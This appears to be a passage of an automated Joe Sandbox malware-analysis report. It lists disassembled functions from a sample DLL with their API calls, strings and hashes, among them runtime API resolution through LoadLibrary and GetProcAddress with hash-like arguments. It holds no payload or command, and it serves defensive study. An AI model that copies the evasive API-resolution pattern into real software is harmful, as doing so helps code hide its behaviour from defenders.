Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: gfff$gfff$gfff$gfff$gfff$gfff$vector<T> too long
API String ID: 1823113695-1254974138
Opcode ID: b44c3caa7c9359b14c94b92cbabffb09aed211a126e8b23b4a211351e96dee9a
Instruction ID: 75e273acad193a677a5e82d6db161a2573caff96f48872b60e3483a7a43f2d9f
Opcode Fuzzy Hash: b44c3caa7c9359b14c94b92cbabffb09aed211a126e8b23b4a211351e96dee9a
Instruction Fuzzy Hash: BE9197B1A04209AFD718CF59DC90FAEB7B9EB88714F04861DE919DB380D730BA04CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6D070CD0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 196COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6D070D3A
std::_Xinvalid_argument.LIBCPMT ref: 6D070D60
_memmove.LIBCMT ref: 6D070D95
std::_Xinvalid_argument.LIBCPMT ref: 6D070DBF
_memmove.LIBCMT ref: 6D070E3E

Strings

invalid string position, xrefs: 6D070D35
string too long, xrefs: 6D070D5B, 6D070DBA

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: invalid string position$string too long
API String ID: 2168136238-4289949731
Opcode ID: aa19169f412b7cb0d53f29fd65e5702a70c261283134e527f0950fd52e9fbe62
Instruction ID: 22c20717356438efa141b208e13e37b3adb450804602c8080571f1651630d068
Opcode Fuzzy Hash: aa19169f412b7cb0d53f29fd65e5702a70c261283134e527f0950fd52e9fbe62
Instruction Fuzzy Hash: DE5195327182059BE734CE5DE880B5EB7FAEBC9354B20861DF855CB284D772EC408795

Uniqueness

Uniqueness Score: -1.00%

Function 6D091B20 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 154libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(User32.dll,?,00000000,?,?,?,?,?,?,?,?), ref: 6D091C5E
LoadLibraryW.KERNEL32(User32.dll,?,00000000,?,?,?,?,?,?,?,?), ref: 6D091C69
GetProcAddress.KERNEL32(00000000,F1F2E532), ref: 6D091CA2
GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 6D091CC1
LoadLibraryW.KERNEL32(kernel32.dll,?,00000000), ref: 6D091CCC
GetProcAddress.KERNEL32(00000000,EFF3E52B), ref: 6D091D0A

Strings

User32.dll, xrefs: 6D091C57, 6D091C64
kernel32.dll, xrefs: 6D091CBA, 6D091CC7

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID: User32.dll$kernel32.dll
API String ID: 310444273-1965990335
Opcode ID: 521452cb61633622252c0c8ca55f7a10c60f2c7e8b7284f9a8a114cd1f1318d6
Instruction ID: db487fb93a128a0fa9fc1f0090ea053bf294ca0615a2e416cd0a39a87e5968d0
Opcode Fuzzy Hash: 521452cb61633622252c0c8ca55f7a10c60f2c7e8b7284f9a8a114cd1f1318d6
Instruction Fuzzy Hash: A4617EB4204A009FE720CF19C185B6ABBF6FF46710F609958D5968FB42D736E847DB82

Uniqueness

Uniqueness Score: -1.00%

Function 6D0D4409 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

UnDecorator::getArgumentList.LIBCMT ref: 6D0D442E

Part of subcall function 6D0D3FC9: Replicator::operator[].LIBCMT ref: 6D0D404C
Part of subcall function 6D0D3FC9: DName::operator+=.LIBCMT ref: 6D0D4054

DName::operator+.LIBCMT ref: 6D0D4487
DName::DName.LIBCMT ref: 6D0D44DF

Strings

,..., xrefs: 6D0D4473
void, xrefs: 6D0D44D7
..., xrefs: 6D0D44C2
<ellipsis>, xrefs: 6D0D44C9, 6D0D44CE
,<ellipsis>, xrefs: 6D0D447A, 6D0D447F

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
String ID: ,...$,<ellipsis>$...$<ellipsis>$void
API String ID: 834187326-2211150622
Opcode ID: ec1403c34088bbcabe78d8ca7edc71e074b8cef90182bea7602d8bb96c49cf07
Instruction ID: 0d21d550e1952c6feeb21b412f99665ab51f61f2b05a439e2ffe29a655963622
Opcode Fuzzy Hash: ec1403c34088bbcabe78d8ca7edc71e074b8cef90182bea7602d8bb96c49cf07
Instruction Fuzzy Hash: DA2192B0604209AFEB51DF58E440BA97BF5EB8A399B04919AEC45CF356CB70D943CF60

Uniqueness

Uniqueness Score: -1.00%

Function 6D0D5D36 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55COMMONLIBRARYCODE

Download Yara Rule

APIs

UnDecorator::UScore.LIBCMT ref: 6D0D5D40
DName::DName.LIBCMT ref: 6D0D5D4C

Part of subcall function 6D0D3B3B: DName::doPchar.LIBCMT ref: 6D0D3B6C

UnDecorator::getScopedName.LIBCMT ref: 6D0D5D8B
DName::operator+=.LIBCMT ref: 6D0D5D95
DName::operator+=.LIBCMT ref: 6D0D5DA4
DName::operator+=.LIBCMT ref: 6D0D5DB0
DName::operator+=.LIBCMT ref: 6D0D5DBD

Strings

void, xrefs: 6D0D5D9C

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
String ID: void
API String ID: 1480779885-3531332078
Opcode ID: 3cd29a819a2e80a5365dc48693a3a4b69b722f6ca70b3017e611c54428e12c42
Instruction ID: 9f6da044d515b4694bd078d37dbc8245723c6689cd5366a348a4d5d56063e7e7
Opcode Fuzzy Hash: 3cd29a819a2e80a5365dc48693a3a4b69b722f6ca70b3017e611c54428e12c42
Instruction Fuzzy Hash: 5311C274904348AFF785DB68C88DBBC7FB0EB16304F01809AD9159B2E1DF709A46CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6D083F10 Relevance: 13.7, APIs: 9, Instructions: 201COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6D083F7B
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D083F8D
VariantInit.OLEAUT32(?), ref: 6D083FB7
SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6D083FD0
VariantClear.OLEAUT32(?), ref: 6D0840C9
VariantClear.OLEAUT32(?), ref: 6D084105
SafeArrayDestroy.OLEAUT32(?), ref: 6D084123
VariantClear.OLEAUT32(?), ref: 6D084157
VariantClear.OLEAUT32(?), ref: 6D084168

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Variant$ArrayClearSafe$Bound$DestroyElementInit
String ID:
API String ID: 758290628-0
Opcode ID: 77da06b53f6ef52dab0add5dfe9aa5a32259a2cb749b72ba93b21b9b54e32831
Instruction ID: f521bddb757378539a67c619fd4ebac37cdf9fa5944c5f0db049b1a3c2b0c0be
Opcode Fuzzy Hash: 77da06b53f6ef52dab0add5dfe9aa5a32259a2cb749b72ba93b21b9b54e32831
Instruction Fuzzy Hash: 8E716876108382AFDB00DF68C884A6BBBF9BB9D704F104A6DF695C7251C734E945CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6D06FC30 Relevance: 13.7, APIs: 9, Instructions: 154fileCOMMON

Download Yara Rule

APIs

UnmapViewOfFile.KERNEL32(00000000,?,?,00000000,400BD10B), ref: 6D06FC98
CloseHandle.KERNEL32(FFFFFFFF,?,?,00000000,400BD10B), ref: 6D06FCAD
CloseHandle.KERNEL32(?,?,?,00000000,400BD10B), ref: 6D06FCB7
SetLastError.KERNEL32(00000000,?,?,00000000,400BD10B), ref: 6D06FCBA
CreateFileW.KERNEL32(?,-00000001,00000001,00000000,00000003,00000000,00000000,?,?,00000000,400BD10B), ref: 6D06FD01
GetFileSizeEx.KERNEL32(00000000,?,?,?,00000000,400BD10B), ref: 6D06FD14
GetLastError.KERNEL32(?,?,00000000,400BD10B), ref: 6D06FD2A
CreateFileMappingW.KERNEL32(?,00000000,?,00000000,00000000,00000000,?,?,00000000,400BD10B), ref: 6D06FD6B
MapViewOfFile.KERNEL32(00000000,?,00000000,00000000,00000000,?,?,00000000,400BD10B), ref: 6D06FD98

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: File$CloseCreateErrorHandleLastView$MappingSizeUnmap
String ID:
API String ID: 1303881157-0
Opcode ID: cbfc21e095353c076090e67b459cbcba461d87e2520921d06f2521fe48e68864
Instruction ID: b0feba41f9bad9ff7e3cf1dc1fcc7410d24b33286bfb266498547f22982b06e0
Opcode Fuzzy Hash: cbfc21e095353c076090e67b459cbcba461d87e2520921d06f2521fe48e68864
Instruction Fuzzy Hash: 3951D6B5A04342AFEB008F34C885B6A7FE9AB49770F1586A9ED15CF2C5D770D8018BB1

Uniqueness

Uniqueness Score: -1.00%

Function 6D0C42B0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 186COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6D0C42DD

Part of subcall function 6D0C90D8: std::exception::exception.LIBCMT ref: 6D0C90ED
Part of subcall function 6D0C90D8: __CxxThrowException@8.LIBCMT ref: 6D0C9102
Part of subcall function 6D0C90D8: std::exception::exception.LIBCMT ref: 6D0C9113

_memmove.LIBCMT ref: 6D0C4363
_memmove.LIBCMT ref: 6D0C4381
_memmove.LIBCMT ref: 6D0C43E6
_memmove.LIBCMT ref: 6D0C4453
_memmove.LIBCMT ref: 6D0C4474

Strings

vector<T> too long, xrefs: 6D0C42D8

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: _memmove$std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: vector<T> too long
API String ID: 4034224661-3788999226
Opcode ID: 76ed2da67afd58554cf4efca278bdd3dd7f360ea1f24e1dd7b4be93ae3a80ecd
Instruction ID: eb20b2c61cb53e94a47348bb081b82347d06cbafa25d112972c3dd582f38a7e7
Opcode Fuzzy Hash: 76ed2da67afd58554cf4efca278bdd3dd7f360ea1f24e1dd7b4be93ae3a80ecd
Instruction Fuzzy Hash: A35183B17082069FD718CF68DC85A6FB7E9FBD8218F154A2DE986C3344E671F904C662

Uniqueness

Uniqueness Score: -1.00%

Function 6D094B60 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 143COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6D094BC8
std::_Xinvalid_argument.LIBCPMT ref: 6D094BE0
std::_Xinvalid_argument.LIBCPMT ref: 6D094BFA
_memmove.LIBCMT ref: 6D094C64
_memmove.LIBCMT ref: 6D094C81

Strings

invalid string position, xrefs: 6D094BC3
string too long, xrefs: 6D094BDB, 6D094BF5

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: invalid string position$string too long
API String ID: 2168136238-4289949731
Opcode ID: 87fa2959c4c9853360c56f5146cecf4af2ee3ed75cce4ffff2091dd6946f9f81
Instruction ID: 99f4eb752ba172fb4efca75d9d5b65aa06a9d7716d85a30bbcc5a9778b7a079b
Opcode Fuzzy Hash: 87fa2959c4c9853360c56f5146cecf4af2ee3ed75cce4ffff2091dd6946f9f81
Instruction Fuzzy Hash: A241B8B2318200AFF324CE1CE880B6EF3E9EB9D615B61491EE1A1CB690C761DC45875A

Uniqueness

Uniqueness Score: -1.00%

Function 6D07FFEA Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 130COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6D0823B3
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823C3
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823D6
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823E9
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823FC
SafeArrayDestroy.OLEAUT32(?), ref: 6D08240F

Strings

RSDi, xrefs: 6D080075

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArrayDestroySafe
String ID: RSDi
API String ID: 4225690600-559181253
Opcode ID: c85850b002bbef58a10b736d18472435ff6cd8c370caf52902eaee29ec55bdce
Instruction ID: 12c9c77919fa17af6cbdf2a8d38d38270813b604b05cb5f873b73ca8a5e14f38
Opcode Fuzzy Hash: c85850b002bbef58a10b736d18472435ff6cd8c370caf52902eaee29ec55bdce
Instruction Fuzzy Hash: 01411A74A016159FDB10DFA9C980F6EB7FAAF89300F60858AE509DB356DB31E941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6D080815 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6D0823B3
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823C3
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823D6
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823E9
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823FC
SafeArrayDestroy.OLEAUT32(?), ref: 6D08240F

Strings

RSUa, xrefs: 6D080864

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArrayDestroySafe
String ID: RSUa
API String ID: 4225690600-2086061799
Opcode ID: d18722ec1b146dee970b46822465c418c8c42c7a76595280f358a804e93db94f
Instruction ID: 36caa4646bfb8c9a5659525e6ac4789e09e1ea609445b781fdc8a412a0a29430
Opcode Fuzzy Hash: d18722ec1b146dee970b46822465c418c8c42c7a76595280f358a804e93db94f
Instruction Fuzzy Hash: 7A312A70E006199FEB10CFA9CD80B6EB7F9AF89300F608596E559EB252C771D981CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6D080787 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6D0823B3
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823C3
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823D6
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823E9
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823FC
SafeArrayDestroy.OLEAUT32(?), ref: 6D08240F

Strings

RSa, xrefs: 6D0807D6

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArrayDestroySafe
String ID: RSa
API String ID: 4225690600-3169278968
Opcode ID: 2d3ef6944112cbbcdf60fced1026b10fe17df866d22c28efc40e5165727bd0d5
Instruction ID: c021c0f3e62b1dc5478ad3463ba0a34f7f81fb58ce73cac4d0b3ba6a29610983
Opcode Fuzzy Hash: 2d3ef6944112cbbcdf60fced1026b10fe17df866d22c28efc40e5165727bd0d5
Instruction Fuzzy Hash: AC312A70E016199FDF10DFA9CD80B6DB7F9AF89300F208596E519EB252CB71D9418F50

Uniqueness

Uniqueness Score: -1.00%

Function 6D0806F9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6D0823B3
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823C3
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823D6
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823E9
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823FC
SafeArrayDestroy.OLEAUT32(?), ref: 6D08240F

Strings

RSqb, xrefs: 6D080748

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArrayDestroySafe
String ID: RSqb
API String ID: 4225690600-347567867
Opcode ID: 429e38478123fd34175f0f560ac2a57b5d3fc06dbcb8439f8f4f2e1821572535
Instruction ID: dd9b93b3c85a97b5c0089afb5302a365701215d46a51611cf2374bfb86eedadf
Opcode Fuzzy Hash: 429e38478123fd34175f0f560ac2a57b5d3fc06dbcb8439f8f4f2e1821572535
Instruction Fuzzy Hash: 28312A70E006199FDF10CFA9CD80B6DB7F9AF89300F608596E519EB252DB75D9818F50

Uniqueness

Uniqueness Score: -1.00%

Function 6D08012D Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6D0823B3
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823C3
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823D6
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823E9
SafeArrayDestroy.OLEAUT32(?), ref: 6D0823FC
